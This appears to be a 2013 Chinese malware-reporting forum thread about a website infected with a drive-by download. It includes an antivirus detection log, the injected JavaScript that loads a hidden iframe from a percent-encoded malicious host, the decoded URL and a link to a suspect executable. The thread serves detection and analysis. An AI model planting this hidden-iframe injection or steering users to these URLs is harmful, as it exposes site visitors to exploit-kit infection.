http://perso.menara.ma/hse/【挂马 by 哀酱】

显示全部楼层 · 发表于 2013-4-11 16:28:48

本帖最后由蓝核于 2013-4-11 17:37 编辑

2013/4/11 16:27:02 已删除 (清理失败，因为该检测项不可清理) l\AA C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Sandbox\AA\IE\user\current\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\42YH25IS\hse[1].htm\00000455.js JS/Exploit-Blacole.da (特洛伊)

显示全部楼层 · 发表于 2013-4-11 16:55:33

if (document.getElementsByTagName('body')[0]){
  iframer();
}
else {
  document.write("
<iframe src='http://%71%65%72%66%68%67%6B%61%64%68%73%66%75%6B%68%65%72%74%67%72%70%6F%74%
67%6A%70%6F%69%64%66%67%2E%63%65%2E%6D%73/main.php?page=b5a87c34230be775' width='10' heigh
t='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
  var f = document.createElement('iframe');
  f.setAttribute('src', '
http://%71%65%72%66%68%67%6B%61%64%68%73%66%75%6B%68%65%72%74%67%72%70%6F%74%67%6A%70%6F%6
9%64%66%67%2E%63%65%2E%6D%73/main.php?page=b5a87c34230be775');
  f.style.visibility = 'hidden';
  f.style.position = 'absolute';
  f.style.left = '0';
  f.style.top = '0';
  f.setAttribute('width', '10');
  f.setAttribute('height', '10');
  document.getElementsByTagName('body')[0].appendChild(f);
}

显示全部楼层 · 发表于 2013-4-11 17:36:13

哀酱俏佳人发表于 2013-4-11 16:55

哀酱，再用ESC解马一下试试

显示全部楼层 · 发表于 2013-4-11 17:36:43

http://qerfhgkadhsfukhertgrpotgjpo
9dfg.ce.ms/main.php?page=b5a87c34230be775

复制代码

显示全部楼层 · 发表于 2013-4-11 18:39:08

蓝核发表于 2013-4-11 17:36
哀酱，再用ESC解马一下试试

看一下这个文件有没有问题

http://212.217.0.30/ws_ftple.exe

显示全部楼层 · 发表于 2013-4-11 18:44:43

哀酱俏佳人发表于 2013-4-11 18:39
看一下这个文件有没有问题

VT安全，火眼我没有激活码

显示全部楼层 · 发表于 2013-4-11 18:48:49

蓝核发表于 2013-4-11 18:44
VT安全，火眼我没有激活码

只释放了一个临时文件。。

[已鉴定] http://perso.menara.ma/hse/【挂马 by 哀酱】